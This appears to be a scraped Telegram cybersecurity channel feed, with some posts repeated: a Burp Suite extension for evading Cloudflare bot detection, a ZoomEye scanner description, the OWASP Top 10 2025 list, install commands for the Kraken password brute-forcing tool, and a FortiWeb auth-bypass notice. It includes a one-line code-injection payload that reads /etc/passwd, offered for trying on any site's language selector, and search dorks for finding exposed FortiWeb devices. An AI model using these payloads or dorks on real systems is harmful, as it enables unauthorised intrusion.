Cloudflare has started blocking proxy tools like Burp Suite. If you encounter this error, download the “Bypass Bot Detection” extension from the BApp Store in Burp Suite. It should resolve the issue for Burp Suite.
#Cloudflare #Pentest #BugBounty #from_X
#Cloudflare #Pentest #BugBounty #from_X
https://www.zoomeye.ai
Key Features and Functionality:
- Extensive Scanning Capabilities: ZoomEye performs continuous, global scans of the entire IPv4 and IPv6 address spaces, detecting open ports, services, and devices.
- Comprehensive Fingerprint Library: The platform maintains a rich database of over 40,000 fingerprints, covering various devices, operating systems, databases, and web applications, enabling precise identification of internet assets.
- Advanced Search Syntax: Users can perform detailed searches using specific queries, such as filtering by application, version, country, city, port, operating system, service, hostname, IP address, and more, facilitating targeted asset discovery.
- Vulnerability Detection: ZoomEye integrates a vulnerability database, allowing users to identify security weaknesses in detected assets, such as outdated software or unpatched vulnerabilities.
and more.....
#SearchEngine
Key Features and Functionality:
- Extensive Scanning Capabilities: ZoomEye performs continuous, global scans of the entire IPv4 and IPv6 address spaces, detecting open ports, services, and devices.
- Comprehensive Fingerprint Library: The platform maintains a rich database of over 40,000 fingerprints, covering various devices, operating systems, databases, and web applications, enabling precise identification of internet assets.
- Advanced Search Syntax: Users can perform detailed searches using specific queries, such as filtering by application, version, country, city, port, operating system, service, hostname, IP address, and more, facilitating targeted asset discovery.
- Vulnerability Detection: ZoomEye integrates a vulnerability database, allowing users to identify security weaknesses in detected assets, such as outdated software or unpatched vulnerabilities.
and more.....
#SearchEngine
SecList for CyberStudents
Cloudflare has started blocking proxy tools like Burp Suite. If you encounter this error, download the “Bypass Bot Detection” extension from the BApp Store in Burp Suite. It should resolve the issue for Burp Suite. #Cloudflare #Pentest #BugBounty #from_X
GitHub
GitHub - PortSwigger/bypass-bot-detection: Burp Suite extension that mutates ciphers to bypass TLS-fingerprint based bot detection
Burp Suite extension that mutates ciphers to bypass TLS-fingerprint based bot detection - PortSwigger/bypass-bot-detection
OWASP TOP 10 2025.pdf
3.6 MB
OWASP Top 10 (2025)
- A01:2025 Broken Access Control
- A02:2025 Security Misconfiguration
- A03:2025 Software Supply Chain Failures
- A04:2025 Cryptographic Failures
- A05:2025 Injection
- A06:2025 Insecure Design
- A07:2025 Authentication Failures
- A08:2025 Software or Data Integrity Failures
- A09:2025 Logging & Alerting Failures
- A10:2025 Mishandling of Exceptional Conditions
👍2
Forwarded from Proxy Bar
Видишь на сайте выбор Language, не поленись !
Language={${system("cat+/etc/passwd")}}😁3🔥2
Forwarded from Codeby
Kraken
Kraken — мощный инструмент на основе Python, разработанный для централизации и оптимизации различных задач подбора паролей. Kraken предоставляет специалистам по кибербезопасности набор инструментов для эффективного проведения атак методом подбора паролей по различным протоколам и сервисам.
Kraken предлагает ряд инструментов для брутфорса:
1️⃣ Сетевые инструменты - FTP, Kubernetes, LDAP, SSH
2️⃣ Инструменты веб-приложений - CPanel, Drupal, Joomla
3️⃣ Инструменты поиска - Admin Panel Finder, Directory Finder, Subdomain Finder
💻 Установка:
📌 Использование:
Kraken — мощный инструмент на основе Python, разработанный для централизации и оптимизации различных задач подбора паролей. Kraken предоставляет специалистам по кибербезопасности набор инструментов для эффективного проведения атак методом подбора паролей по различным протоколам и сервисам.
Kraken предлагает ряд инструментов для брутфорса:
git clone https://github.com/jasonxtn/kraken.git
cd kraken
pip3 install -r requirements.txt
python3 kraken.py
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Suhayl.log
This media is not supported in your browser
VIEW IN TELEGRAM
Fortinet 0day
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"
An auth bypass + path traversal in Fortinet FortiWeb to create new administrative users on exposed devices without requiring authentication.
Blog: https://www.rapid7.com/blog/post/etr-critical-vulnerability-in-fortinet-fortiweb-exploited-in-the-wild/
Dork:
ZoomEye Dork: app="FortiWeb"
HUNTER: product.name="FortiWeb"